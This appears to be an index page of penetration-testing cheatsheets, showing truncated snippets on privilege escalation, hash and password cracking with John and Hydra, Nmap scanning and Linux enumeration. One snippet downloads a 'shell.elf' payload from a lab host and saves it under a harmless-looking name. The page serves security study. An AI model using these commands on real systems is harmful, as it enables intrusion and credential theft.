Introduction This cheatsheet provides a structured methodology for identifying and exploiting Windows privilege escalation vectors. It includes commands, explanations, and a checklist approach for...

Information Gathering Tools WhatWeb # Basic scan whatweb target.com # Aggressive scan with detailed output whatweb -a 3 -v target.com # Export results to JSON whatweb -a 3 --log-json=results.js...

Table of Contents Introduction to Hash Cracking NTLM Hashes Unshadowing Custom Wordlists with CeWL Rule-Based Attacks with John Custom Rules in John Password Spray Attacks Default,...

Introduction Hydra is a fast and flexible online password cracking tool that supports numerous protocols including SSH, FTP, HTTP, SMB, and many others. This cheatsheet provides syntax and example...

Core Concepts Plaintext: The original, readable data before encryption. Ciphertext: The scrambled, unreadable result after encryption. Cipher: An algorithm or method used to perform encrypt...

Introduction This document provides a comprehensive guide for assessing and exploiting common network services during penetration testing. For each service, we’ll cover enumeration techniques, exp...

TCP/UDP Port States and Firewall Responses Open: Response: SYN-ACK for TCP, application response for UDP Firewall Behavior: Stateful firewalls track these as established connec...

TCP/UDP Port States Open: Port actively accepting connections; service is listening. Nmap receives positive response (SYN-ACK for TCP scans, relevant UDP response for UDP scans). Closed: Port...

Basic HTTP Transfers Wget # Download file wget http://10.10.10.1:8000/shell.elf # Download with custom output name wget http://10.10.10.1:8000/shell.elf -O /tmp/safe.bin # Download in background...

1. Initial Enumeration Basic System Information whoami id hostname uname -a cat /etc/os-release lscpu cat /etc/shells echo $PATH env Network Information ip a ifconfig or ip -a route or netstat...